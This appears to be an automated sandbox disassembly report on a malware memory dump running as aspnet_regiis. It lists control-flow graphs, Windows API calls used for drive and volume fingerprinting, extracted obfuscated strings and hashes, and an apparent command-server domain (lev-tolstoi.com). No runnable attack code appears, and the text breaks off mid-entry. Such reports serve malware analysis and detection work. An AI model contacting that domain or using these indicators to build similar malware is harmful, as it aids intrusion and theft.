                                                                                                                                                                                                                                            control_flow_graph 651 40a700-40a760 652 40a7b1-40a7ce call 432fa0 651->652 653 40a762 651->653 658 40a7d4-40a8f4 call 434c30 * 12 652->658 659 40aee8-40aef1 652->659 654 40a770-40a7af 653->654 654->652 654->654 684 40a900-40a91f call 42eff0 658->684 687 40a920-40a927 684->687 687->687 688 40a929-40a93b 687->688 689 40a93d-40a94a 688->689 690 40a99e-40a9ae call 40af00 688->690 691 40a950-40a953 689->691 698 40ac44-40ac51 690->698 699 40a9b4-40a9ba 690->699 693 40a990-40a993 691->693 694 40a955-40a974 call 40ce30 691->694 697 40a996-40a99a 693->697 705 40a976-40a97c 694->705 706 40a97e-40a984 694->706 697->690 700 40ac71-40ac78 698->700 701 40ac53-40ac57 698->701 699->684 703 40a9c0-40aadb GetProcessVersion 699->703 700->659 704 40ac60-40ac6f 701->704 707 40aadd-40aadf 703->707 708 40ab1f-40ab38 call 40b590 703->708 704->700 704->704 705->691 705->706 706->697 709 40aae0-40ab1d 707->709 712 40ac7d-40ac7f 708->712 713 40ab3e-40abaf 708->713 709->708 709->709 712->659 714 40abb1 713->714 715 40abff-40ac0a 713->715 716 40abc0-40abfd 714->716 717 40ac84 715->717 718 40ac0c-40ac10 715->718 716->715 716->716 719 40ac86-40ac88 717->719 720 40ac27-40ac2b 718->720 721 40aeda 719->721 722 40ac8e-40acbb 719->722 720->721 723 40ac31-40ac38 720->723 726 40aedc-40aee5 call 431cf0 721->726 724 40acbd-40acbf 722->724 725 40acff-40ad0a 722->725 727 40ac3a-40ac3c 723->727 728 40ac3e 723->728 729 40acc0-40acfd 724->729 730 40ad44-40ad46 725->730 731 40ad0c-40ad18 725->731 726->659 727->728 733 40ac20-40ac25 728->733 734 40ac40-40ac42 728->734 729->725 729->729 730->721 735 40ad4c-40ad58 730->735 736 40ad27-40ad2b 731->736 733->719 733->720 734->733 738 40ad60-40ad68 735->738 736->721 739 40ad31-40ad38 736->739 738->738 740 40ad6a-40ad6d 738->740 741 40ad3a-40ad3c 739->741 742 40ad3e 739->742 745 40ad73-40ad75 740->745 746 40ae19-40ae28 740->746 741->742 743 40ad20-40ad25 742->743 744 40ad40-40ad42 742->744 743->730 743->736 744->743 747 40ade5-40ade7 745->747 748 40ad77-40ad80 745->748 749 40ae30-40ae37 746->749 750 40ade9-40adee 747->750 751 40ad9b-40ada6 748->751 749->749 752 40ae39-40ae4f 749->752 750->746 753 40adf0-40adfd 750->753 754 40ada8-40adb0 751->754 755 40adbc-40add2 751->755 756 40ae90-40ae96 call 40af00 752->756 757 40ae51 752->757 758 40ae12 753->758 759 40adff-40ae07 753->759 761 40adb2-40adb5 754->761 762 40adb7-40adba 754->762 764 40add4-40addc 755->764 765 40ad87-40ad99 755->765 768 40ae9b-40aea0 756->768 763 40ae53-40ae56 757->763 758->746 766 40ae09-40ae0b 759->766 767 40ae0d-40ae10 759->767 761->762 762->755 769 40ae86-40ae89 763->769 770 40ae58-40ae74 call 40ce30 763->770 771 40ad82-40ad85 764->771 772 40adde-40ade3 764->772 765->750 765->751 766->767 767->758 768->721 774 40aea2-40aeaf 768->774 773 40ae8c 769->773 780 40ae76-40ae7c 770->780 781 40ae7e-40ae84 770->781 771->765 772->771 773->756 776 40aed1-40aed8 774->776 777 40aeb1-40aeb5 774->777 776->726 779 40aec0-40aecf 777->779 779->776 779->779 780->763 780->781 781->773
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetProcessVersion.KERNELBASE(00000000), ref: 0040A9C2
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ProcessVersion
                                                                                                                                                                                                                                            • String ID: :9f$!iVg$#m[k$4$5$8M7K$J17O$O=O;$Tebc$Z)_'$lev-tolstoi.com$m]k[$r_
                                                                                                                                                                                                                                            • API String ID: 2384128931-274085115
                                                                                                                                                                                                                                            • Opcode ID: fe014ef6bbda5ebaf024359d3f782e82e0a1d4785f1d2b1bed6f206d322882e9
                                                                                                                                                                                                                                            • Instruction ID: 3df28268271602e2693868b007154afb43df221d606cfe4bbbce09ed062064ae
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe014ef6bbda5ebaf024359d3f782e82e0a1d4785f1d2b1bed6f206d322882e9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4412EEB06093418FD314DF15D8907AEBBE1EF82304F18592EE8D46B3A1E7399915CB9B

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1449868515-3916222277
                                                                                                                                                                                                                                            • Opcode ID: 782ec37c2959ebf7219d55dcd697bacab111a354c5e84ff78982d263564235c1
                                                                                                                                                                                                                                            • Instruction ID: 755983a96c950bb84d05556132b73eae1f5c21d6c1609a55007af39724c8ed97
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 782ec37c2959ebf7219d55dcd697bacab111a354c5e84ff78982d263564235c1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F517EB0A147008FD754EF3DD98561ABBF0BB89304F41992DE89AC7761E774E848CB46

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 909 432fe0-43302f 910 433031 909->910 911 433079-433096 call 434550 909->911 912 433040-433077 910->912 915 433202-43320a 911->915 916 433200 911->916 917 4332e0 911->917 918 433300 911->918 919 4331a5-4331e8 call 434c30 * 3 call 433460 911->919 920 433304-43330a GetLogicalDrives call 42df70 911->920 921 433229-433277 911->921 922 43330f-433315 GetLogicalDrives call 42df70 911->922 923 43336d-433399 911->923 924 433212-433218 911->924 925 4333f1-4333f2 call 431c50 911->925 926 433210 911->926 927 4332f0 911->927 928 4331f7-4331ff 911->928 929 433219 911->929 930 4332f8-4332ff 911->930 931 43321f-433222 911->931 932 43335f-433366 911->932 933 43309d-43314c call 434c30 * 4 911->933 934 4333fc-433405 call 431cf0 911->934 912->911 912->912 915->926 916->915 917->927 918->920 966 4331ed-4331f0 919->966 920->922 940 4332bb-4332c2 921->940 941 433279 921->941 950 43331a call 42df70 922->950 943 4333db-4333ef RtlReAllocateHeap 923->943 944 43339b 923->944 945 4333f7-4333fa 925->945 926->924 927->930 928->916 929->931 930->918 931->917 931->918 931->921 931->923 931->924 931->925 931->927 931->930 931->932 931->934 932->923 932->934 968 433189-43319e call 434550 933->968 969 43314e-43314f 933->969 952 433407-43340d 934->952 955 4332c5-4332c7 940->955 949 433280-4332b9 941->949 943->952 951 4333a0-4333d9 944->951 945->952 949->940 949->949 951->943 951->951 958 4332c9 955->958 959 4332ce-4332d5 955->959 958->959 959->917 959->918 959->923 959->924 959->925 959->930 959->932 959->934 966->916 966->917 966->918 966->920 966->921 966->922 966->923 966->924 966->925 966->927 966->928 966->929 966->930 966->931 966->932 966->934 968->915 968->916 968->917 968->918 968->919 968->920 968->921 968->922 968->923 968->924 968->925 968->926 968->927 968->928 968->929 968->930 968->931 968->932 968->934 970 433150-433187 969->970 970->968 970->970
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLogicalDrives.KERNEL32 ref: 00433304
                                                                                                                                                                                                                                            • GetLogicalDrives.KERNELBASE ref: 0043330F
                                                                                                                                                                                                                                            • RtlReAllocateHeap.NTDLL(00000000,00000000,00000001,00433212), ref: 004333E9
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DrivesLogical$AllocateHeap
                                                                                                                                                                                                                                            • String ID: d)z'$QS$Y.[
                                                                                                                                                                                                                                            • API String ID: 1807012297-2110187971
                                                                                                                                                                                                                                            • Opcode ID: a21c3b3f4129e15553885237df2213b0de1d0c04081bc220a0e5d232e9afbb2b
                                                                                                                                                                                                                                            • Instruction ID: a8c283327fb45fc391599db1a69f02f2c0a784cc0b9ec3ef168b260d4b5d457c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a21c3b3f4129e15553885237df2213b0de1d0c04081bc220a0e5d232e9afbb2b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DAA1DB75519300CBD304EF26E841A5FBBE2EB89304F109A3DE4C9973A2D7399915CF9A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: (+-5$AV$SE$T]$oykk$y=qy$fA
                                                                                                                                                                                                                                            • API String ID: 0-519748777
                                                                                                                                                                                                                                            • Opcode ID: c9d11731da2e678f01195484704827eb20ee9124c1b941aa6c9af1edbd9e7861
                                                                                                                                                                                                                                            • Instruction ID: dc00e2a7a5827f0aec3bf4046c35abf41c853e01f1f57966a56dcfd989a70e2e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9d11731da2e678f01195484704827eb20ee9124c1b941aa6c9af1edbd9e7861
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2E8275B15083418BD324CF14D8916ABBBE2FFC6344F14892EE8D94B391E778D945CB9A

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 1206 4157d0-4157f1 1207 4157f8-415836 1206->1207 1208 415bce-415bd3 1206->1208 1209 415884-4158e0 call 4140a0 1207->1209 1210 415838 1207->1210 1213 416066 1208->1213 1216 4158e2 1209->1216 1217 415936-4159c4 call 4140a0 1209->1217 1211 415840-415882 1210->1211 1211->1209 1211->1211 1215 416069-41607a call 408d30 1213->1215 1222 4160a1-4160b1 1215->1222 1223 41607c-416081 1215->1223 1219 4158f0-415934 1216->1219 1228 415a16-415a6d call 4140a0 1217->1228 1229 4159c6 1217->1229 1219->1217 1219->1219 1226 4160d1-4160d8 1222->1226 1227 4160b3-4160b7 1222->1227 1225 416090-41609f 1223->1225 1225->1222 1225->1225 1232 4160e0-4160f7 call 42ed00 call 4140a0 1226->1232 1231 4160c0-4160cf 1227->1231 1236 415ab6-415abf call 4140a0 1228->1236 1237 415a6f 1228->1237 1233 4159d0-415a14 1229->1233 1231->1226 1231->1231 1243 4160fc-416102 1232->1243 1233->1228 1233->1233 1242 415ac4-415b22 1236->1242 1239 415a70-415ab4 1237->1239 1239->1236 1239->1239 1244 415b24 1242->1244 1245 415b76-415baa 1242->1245 1246 4162c0 1243->1246 1247 4162c2 1243->1247 1248 4162e2-41636a 1243->1248 1249 416126-4161c0 1243->1249 1250 416426 1243->1250 1251 416109-416111 1243->1251 1252 4162ca-4162db call 408d40 1243->1252 1253 4162ad-4162b3 1243->1253 1254 416230-416236 1243->1254 1255 416417-41641f 1243->1255 1256 416118-416119 1243->1256 1257 41611b-41611f 1243->1257 1258 41627e-416284 1243->1258 1266 415b30-415b74 1244->1266 1267 415bb0-415bb9 1245->1267 1246->1247 1247->1252 1260 4163c5-4163f7 1248->1260 1261 41636c-41636f 1248->1261 1262 4161c2 1249->1262 1263 416225 1249->1263 1264 41642e-416440 call 408d30 1250->1264 1251->1246 1251->1247 1251->1248 1251->1249 1251->1250 1251->1252 1251->1253 1251->1254 1251->1255 1251->1256 1251->1257 1251->1258 1252->1248 1252->1250 1253->1246 1254->1254 1265 416238-41623f 1254->1265 1255->1248 1255->1250 1256->1232 1257->1246 1257->1247 1257->1248 1257->1249 1257->1250 1257->1252 1257->1253 1257->1254 1257->1255 1257->1258 1258->1258 1268 416286-41628d 1258->1268 1275 416400-416409 1260->1275 1274 416370-4163c3 1261->1274 1269 4161d0-416223 1262->1269 1263->1254 1284 416461-416471 1264->1284 1285 416442-416448 1264->1285 1271 416241-416245 1265->1271 1272 41625b-416263 1265->1272 1266->1245 1266->1266 1267->1267 1276 415bbb-415bbe 1267->1276 1277 416270-416273 1268->1277 1278 41628f-416293 1268->1278 1269->1263 1269->1269 1281 416250-416259 1271->1281 1272->1258 1274->1260 1274->1274 1275->1275 1279 41640b-41640e 1275->1279 1276->1213 1282 415bc4-415bc9 1276->1282 1277->1258 1283 4162a0-4162a9 1278->1283 1286 416410-416415 1279->1286 1287 41642b 1279->1287 1281->1272 1281->1281 1282->1215 1283->1283 1288 4162ab 1283->1288 1290 416491-4164e8 1284->1290 1291 416473-41647a 1284->1291 1289 416450-41645f 1285->1289 1286->1264 1287->1264 1288->1277 1289->1284 1289->1289 1293 416536-41656b 1290->1293 1294 4164ea 1290->1294 1292 416480-41648f 1291->1292 1292->1290 1292->1292 1296 416570-416579 1293->1296 1295 4164f0-416534 1294->1295 1295->1293 1295->1295 1296->1296 1297 41657b-416586 1296->1297 1298 416590-416599 1297->1298 1298->1298 1299 41659b-4165a7 1298->1299 1300 4165b0-4165b2 1299->1300 1301 4165a9-4165ae 1299->1301 1302 4165b9-4165ca call 408d30 1300->1302 1301->1302 1305 4165f1-4165ff 1302->1305 1306 4165cc-4165d1 1302->1306 1308 416601-416607 1305->1308 1309 416623 1305->1309 1307 4165e0-4165ef 1306->1307 1307->1305 1307->1307 1310 416610-41661f 1308->1310 1311 416626-416636 1309->1311 1310->1310 1312 416621 1310->1312 1313 416651-41667d 1311->1313 1314 416638-41663f 1311->1314 1312->1311 1316 41667f 1313->1316 1317 4166be-416712 call 419000 1313->1317 1315 416640-41664f 1314->1315 1315->1313 1315->1315 1319 416680-4166bc 1316->1319 1319->1317 1319->1319
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: AV$SE$T]$oykk$y=qy$[A$fA
                                                                                                                                                                                                                                            • API String ID: 0-4172716543
                                                                                                                                                                                                                                            • Opcode ID: be38f0a5e77af9e1a5e90945fff06f46024cdcfcf441811dcb41cc2621d21abf
                                                                                                                                                                                                                                            • Instruction ID: cb5a27a3645892fc926138ee212282b148d83224d4ac8c9e67cde114efd09afd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: be38f0a5e77af9e1a5e90945fff06f46024cdcfcf441811dcb41cc2621d21abf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E4294B15083408BD324CF14C5917ABBBE2FFC6358F15891EE8D94B391D7788949CB8A

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 1322 40a0a0-40a0b3 1323 40a0b5-40a0c1 1322->1323 1324 40a0ee-40a0f0 1322->1324 1325 40a0c3-40a0c5 1323->1325 1326 40a0f5-40a102 1323->1326 1327 40a6f5-40a6fe 1324->1327 1329 40a104-40a10b 1325->1329 1330 40a0c7-40a0ec 1325->1330 1328 40a13a-40a1af call 406bd0 call 42ea20 call 408d30 1326->1328 1339 40a1b1 1328->1339 1340 40a1fe-40a23d call 409940 1328->1340 1331 40a125-40a135 1329->1331 1332 40a10d-40a123 1329->1332 1330->1332 1331->1328 1332->1328 1341 40a1c0-40a1fc 1339->1341 1344 40a27e-40a2be call 409940 1340->1344 1345 40a23f 1340->1345 1341->1340 1341->1341 1349 40a300-40a34a call 409940 1344->1349 1350 40a2c0-40a2fe 1344->1350 1346 40a240-40a27c 1345->1346 1346->1344 1346->1346 1353 40a34c-40a34f 1349->1353 1354 40a38e-40a3b4 1349->1354 1350->1349 1350->1350 1355 40a350-40a38c 1353->1355 1356 40a3b6 1354->1356 1357 40a3fe-40a435 call 409940 1354->1357 1355->1354 1355->1355 1358 40a3c0-40a3fc 1356->1358 1361 40a437 1357->1361 1362 40a47e-40a5ee call 409be0 1357->1362 1358->1357 1358->1358 1363 40a440-40a47c 1361->1363 1366 40a5f0-40a631 1362->1366 1367 40a633-40a670 1362->1367 1363->1362 1363->1363 1366->1366 1366->1367 1368 40a6c0-40a6e0 call 40c670 call 408d40 1367->1368 1369 40a672 1367->1369 1374 40a6e5-40a6ee 1368->1374 1370 40a680-40a6be 1369->1370 1370->1368 1370->1370 1374->1327
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: $0$MJV#$de$r$=?$y{
                                                                                                                                                                                                                                            • API String ID: 0-1020437172
                                                                                                                                                                                                                                            • Opcode ID: 58f934d51d4fdb6a4d2afd5cad5ff2d32bd1957ad2e925c54d4f52bb63af5282
                                                                                                                                                                                                                                            • Instruction ID: 2553938272f813e02b7dde3977aaa5cfa43c974a3157249c6ae3a8d6dcf5c4f5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 58f934d51d4fdb6a4d2afd5cad5ff2d32bd1957ad2e925c54d4f52bb63af5282
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B0210B0208380ABD314CF25C590B6BBBE2ABC5744F548A2DF4D98B392D778D805DB4B
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVolumeInformationW.KERNELBASE(B347AD5A,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0042EB67
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InformationVolume
                                                                                                                                                                                                                                            • String ID: 2B$RB
                                                                                                                                                                                                                                            • API String ID: 2039140958-2208005670
                                                                                                                                                                                                                                            • Opcode ID: 62147a63e097d6bb038f264d4093d410b7b6430bc493eaad2db901404af3ee23
                                                                                                                                                                                                                                            • Instruction ID: d1ab291a97e992e22756c0650c134a5f9b0ffe5d9c37626236ed16de0dfbd978
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 62147a63e097d6bb038f264d4093d410b7b6430bc493eaad2db901404af3ee23
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48D1D3316083119FD314CF19E89172FB7E2FB89314F558A2DF99657290C7789904CB9A
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(8375854B,00000104), ref: 0040D468
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectorySystem
                                                                                                                                                                                                                                            • String ID: lev-tolstoi.com$pedc
                                                                                                                                                                                                                                            • API String ID: 2188284642-822483082
                                                                                                                                                                                                                                            • Opcode ID: aa826d0f279e804bf47255f7a83c24bcb0d6657c2ead7bc93b160747b092dee2
                                                                                                                                                                                                                                            • Instruction ID: c42a86530aaedcccb0a593ce7615208ae0afe3e94c0c10be7e3d7ba17a93e8cc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa826d0f279e804bf47255f7a83c24bcb0d6657c2ead7bc93b160747b092dee2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E5C1ACB15493D28BE3708F24C484B9BBBE1EFD2304F154A6DE8E85B391C73949498B97
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: r$)+$57$=?
                                                                                                                                                                                                                                            • API String ID: 0-253682767
                                                                                                                                                                                                                                            • Opcode ID: 6dd39737549b99e3890198121a449eca8da541e8d158095ee5e390efb8a57515
                                                                                                                                                                                                                                            • Instruction ID: da1dd33ba0f03b92d1e1d8b895c4313dbe3d5cac15efdac7fe32d0d3583f2246
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6dd39737549b99e3890198121a449eca8da541e8d158095ee5e390efb8a57515
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2E19A76618380CFD3248F14D8917ABBBF1EFC6344F40592DE5CA9B291D7B89845CB8A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ":C$@$gY<S$j}
                                                                                                                                                                                                                                            • API String ID: 0-499844015
                                                                                                                                                                                                                                            • Opcode ID: af6570c47c9b3880a8d757df13c0fe478a9a137867016910190fe9325aa16350
                                                                                                                                                                                                                                            • Instruction ID: a6b2f1696e24f5b0969ea865adff2c46d8e5e654b6fbf4898ab95583f0a01a42
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: af6570c47c9b3880a8d757df13c0fe478a9a137867016910190fe9325aa16350
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1EE15474608301AFD314CF15C590B2BBBE2ABCA759F14A92DE48987390D778DD06DB8A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: )$)$IEND
                                                                                                                                                                                                                                            • API String ID: 0-588110143
                                                                                                                                                                                                                                            • Opcode ID: b6237465425eaa85b41594be0fa2d71e7190e7bcec4c4283aa9127c9c9496032
                                                                                                                                                                                                                                            • Instruction ID: e248686785af1d63fe639355df3a55e2ef5919efc3b21b5ed07e0b66ef1c5577
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6237465425eaa85b41594be0fa2d71e7190e7bcec4c4283aa9127c9c9496032
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97E1AFB1A087019FD310DF29C84171BBBE0BB94314F144A3EE994AB3C1D779E915CB8A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: 0$r
                                                                                                                                                                                                                                            • API String ID: 0-2496253236
                                                                                                                                                                                                                                            • Opcode ID: da6a22461841a95a82ffe3a19e5caa992804dbff797c3f45e9d73f7a6cbc950f
                                                                                                                                                                                                                                            • Instruction ID: 603367283566479ed8ccb75802ce0714d44a23040706ee789639a5586186cdd6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da6a22461841a95a82ffe3a19e5caa992804dbff797c3f45e9d73f7a6cbc950f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C432DF715083808FD325DF24C4907ABBBF1EF96304F04896EE5C997292D7799885CB9B
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: -'$2
                                                                                                                                                                                                                                            • API String ID: 0-1998670012
                                                                                                                                                                                                                                            • Opcode ID: 9c1fc6cc03533ea69ce05d3ac9821036f9f35d17739f71097699bd7021148825
                                                                                                                                                                                                                                            • Instruction ID: 781d8270466ba6e68da91edbd15d02616b4ebf166ffe0c0ef1e1133d189ff415
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c1fc6cc03533ea69ce05d3ac9821036f9f35d17739f71097699bd7021148825
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B202BD719082408BD725EF28D88071FBBE1FF96308F04493DE585A7391EB399949CB9A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: /.)($AA
                                                                                                                                                                                                                                            • API String ID: 0-1527991423
                                                                                                                                                                                                                                            • Opcode ID: 9c1045a2656030a4945d8d47df94106f17efee5ff85136e2157468294873dc7e
                                                                                                                                                                                                                                            • Instruction ID: 5d2d0c719645c5501e68dfb5138feb6adb5c67064f7e7de7a564a69b2d4c628e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c1045a2656030a4945d8d47df94106f17efee5ff85136e2157468294873dc7e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77C112B56042118BD724DF18DC917BBB3E1FFD5314F08562EE9868B391E7389990C78A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: $%$ig
                                                                                                                                                                                                                                            • API String ID: 0-1471383516
                                                                                                                                                                                                                                            • Opcode ID: f8a91ff8b0fa27f7d43ca47714211126ff68ff85ca3e8d8384a8484bbf2cd18a
                                                                                                                                                                                                                                            • Instruction ID: cabe2240e1eac321f13664e075a325129ada21a301aa0fb3202e32c33cf6677b
